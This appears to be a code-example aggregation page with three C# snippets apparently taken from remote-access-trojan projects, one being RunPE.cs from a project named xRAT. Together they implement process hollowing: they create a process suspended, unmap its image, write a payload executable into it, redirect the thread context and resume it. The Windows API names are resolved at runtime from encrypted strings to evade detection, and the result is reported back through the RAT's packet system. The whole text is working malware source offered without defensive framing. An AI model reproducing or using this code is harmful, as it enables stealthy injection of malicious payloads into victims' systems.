示例#1
0
        public IntPtr AllocMem(IntPtr hProc, uint size, int allocType, int protection)
        {
            var args = new object[5];

            args[0] = hProc;
            args[2] = size;
            args[3] = allocType;
            args[4] = protection;
            return((IntPtr)VirtualAllocEx.Invoke(null, args));
        }
示例#2
0
 public static void Initialize()
 {
     //DynamicCreateProcess = Core.CreateAPI<CreateProcess>(Core.KERNEL32, StringCipher.Decrypt("[CreateProcessW]", Config.MUTEX));
     DynamicGetThreadContext      = Core.CreateAPI <GetThreadContext>(Core.KERNEL32, StringCipher.Decrypt("[GetThreadContext]", Config.MUTEX));
     DynamicNtUnmapViewOfSection  = Core.CreateAPI <NtUnmapViewOfSection>("ntdll", StringCipher.Decrypt("[NtUnmapViewOfSection]", Config.MUTEX));
     DynamicReadProcessMemory     = Core.CreateAPI <ReadProcessMemory>(Core.KERNEL32, StringCipher.Decrypt("[ReadProcessMemory]", Config.MUTEX));
     DynamicResumeThread          = Core.CreateAPI <ResumeThread>(Core.KERNEL32, StringCipher.Decrypt("[ResumeThread]", Config.MUTEX));
     DynamicSetThreadContext      = Core.CreateAPI <SetThreadContext>(Core.KERNEL32, StringCipher.Decrypt("[SetThreadContext]", Config.MUTEX));
     DynamicVirtualAllocEx        = Core.CreateAPI <VirtualAllocEx>(Core.KERNEL32, StringCipher.Decrypt("[VirtualAllocEx]", Config.MUTEX));
     DynamicWow64GetThreadContext = Core.CreateAPI <Wow64GetThreadContext>(Core.KERNEL32, StringCipher.Decrypt("[Wow64GetThreadContext]", Config.MUTEX));
     DynamicWow64SetThreadContext = Core.CreateAPI <Wow64SetThreadContext>(Core.KERNEL32, StringCipher.Decrypt("[Wow64SetThreadContext]", Config.MUTEX));
     DynamicWriteProcessMemory    = Core.CreateAPI <WriteProcessMemory>(Core.KERNEL32, StringCipher.Decrypt("[WriteProcessMemory]", Config.MUTEX));
 }
示例#3
0
文件: RunPE.cs 项目: Yulya1488/xRAT
        private static bool HandleRun(string path, string cmd, byte[] data, bool compatible)
        {
            CreateProcessA       createProc           = makeAPI <CreateProcessA>("kernel32", "CreateProcessA");
            RPM                  readProcessMemory    = makeAPI <RPM>("kernel32", "ReadProcessMemory");
            ReadProcessMemory2   readProcessMemory2   = makeAPI <ReadProcessMemory2>("kernel32", "ReadProcessMemory");
            WriteProcessMemory   writeProcessMemory   = makeAPI <WriteProcessMemory>("kernel32", "WriteProcessMemory");
            GetThreadContext     getThreadContext     = makeAPI <GetThreadContext>("kernel32", "GetThreadContext");
            SetThreadContext     setThreadContext     = makeAPI <SetThreadContext>("kernel32", "SetThreadContext");
            NtUnmapViewOfSection ntUnmapViewOfSection = makeAPI <NtUnmapViewOfSection>("ntdll", "NtUnmapViewOfSection");
            VirtualAllocEx       virtualAllocEx       = makeAPI <VirtualAllocEx>("kernel32", "VirtualAllocEx");
            ResumeThread         resumeThread         = makeAPI <ResumeThread>("kernel32", "ResumeThread");

            int    ReadWrite  = 0;
            string pPath      = path;//Application.ExecutablePath;
            string QuotedPath = string.Format("\"{0}\"", pPath);

            STARTUP_INFORMATION SI = new STARTUP_INFORMATION();
            PROCESS_INFORMATION PI = new PROCESS_INFORMATION();

            SI.Size = Convert.ToUInt32(Marshal.SizeOf(typeof(STARTUP_INFORMATION)));

            try
            {
                if (string.IsNullOrEmpty(cmd))
                {
                    if (!createProc(pPath, QuotedPath, IntPtr.Zero, IntPtr.Zero, false, 4, IntPtr.Zero, null, ref SI, ref PI))
                    {
                        throw new Exception();
                    }
                }
                else
                {
                    QuotedPath = QuotedPath + " " + cmd;
                    if (!createProc(pPath, QuotedPath, IntPtr.Zero, IntPtr.Zero, false, 4, IntPtr.Zero, null, ref SI, ref PI))
                    {
                        throw new Exception();
                    }
                }

                int FileAddress = BitConverter.ToInt32(data, 60);
                int ImageBase   = BitConverter.ToInt32(data, FileAddress + 52);

                int[] Context = new int[179];
                Context[0] = 65538;

                if (!getThreadContext(PI.ThreadHandle, Context))
                {
                    throw new Exception();
                }

                int Ebx         = Context[41];
                int BaseAddress = 0;
                if (!readProcessMemory(PI.ProcessHandle, Ebx + 8, ref BaseAddress, 4, ref ReadWrite))
                {
                    throw new Exception();
                }

                if (ImageBase == BaseAddress)
                {
                    if (!(ntUnmapViewOfSection(PI.ProcessHandle, BaseAddress) == 0))
                    {
                        throw new Exception();
                    }
                }

                int SizeOfImage   = BitConverter.ToInt32(data, FileAddress + 80);
                int SizeOfHeaders = BitConverter.ToInt32(data, FileAddress + 84);

                bool AllowOverride = false;
                int  NewImageBase  = virtualAllocEx(PI.ProcessHandle, ImageBase, SizeOfImage, 12288, 64);

                //This is the only way to execute under certain conditions. However, it may show
                //an application error probably because things aren't being relocated properly.

                if (!compatible && NewImageBase == 0)
                {
                    AllowOverride = true;
                    NewImageBase  = virtualAllocEx(PI.ProcessHandle, 0, SizeOfImage, 12288, 64);
                }

                if (NewImageBase == 0)
                {
                    throw new Exception();
                }

                if (!writeProcessMemory(PI.ProcessHandle, NewImageBase, data, SizeOfHeaders, ref ReadWrite))
                {
                    throw new Exception();
                }

                int   SectionOffset    = FileAddress + 248;
                short NumberOfSections = BitConverter.ToInt16(data, FileAddress + 6);

                for (int I = 0; I <= NumberOfSections - 1; I++)
                {
                    int VirtualAddress   = BitConverter.ToInt32(data, SectionOffset + 12);
                    int SizeOfRawData    = BitConverter.ToInt32(data, SectionOffset + 16);
                    int PointerToRawData = BitConverter.ToInt32(data, SectionOffset + 20);

                    if (!(SizeOfRawData == 0))
                    {
                        byte[] SectionData = new byte[SizeOfRawData];
                        Buffer.BlockCopy(data, PointerToRawData, SectionData, 0, SectionData.Length);

                        if (!writeProcessMemory(PI.ProcessHandle, NewImageBase + VirtualAddress, SectionData, SectionData.Length, ref ReadWrite))
                        {
                            throw new Exception();
                        }
                    }

                    SectionOffset += 40;
                }

                byte[] PointerData = BitConverter.GetBytes(NewImageBase);
                if (!writeProcessMemory(PI.ProcessHandle, Ebx + 8, PointerData, 4, ref ReadWrite))
                {
                    throw new Exception();
                }

                int AddressOfEntryPoint = BitConverter.ToInt32(data, FileAddress + 40);

                if (AllowOverride)
                {
                    NewImageBase = ImageBase;
                }
                Context[44] = NewImageBase + AddressOfEntryPoint;

                if (!setThreadContext(PI.ThreadHandle, Context))
                {
                    throw new Exception();
                }
                if (resumeThread(PI.ThreadHandle) == -1)
                {
                    throw new Exception();
                }
                // create a new thread

                new Packets.ClientPackets.Status("Executed in memory!").Execute(current);
            }
            catch (Exception ex)
            {
                new Packets.ClientPackets.Status("RunPE Error: " + ex.Message).Execute(current);
                Process P = Process.GetProcessById(Convert.ToInt32(PI.ProcessId));
                if (P != null)
                {
                    P.Kill();
                }

                return(false);
            }
            return(true);
        }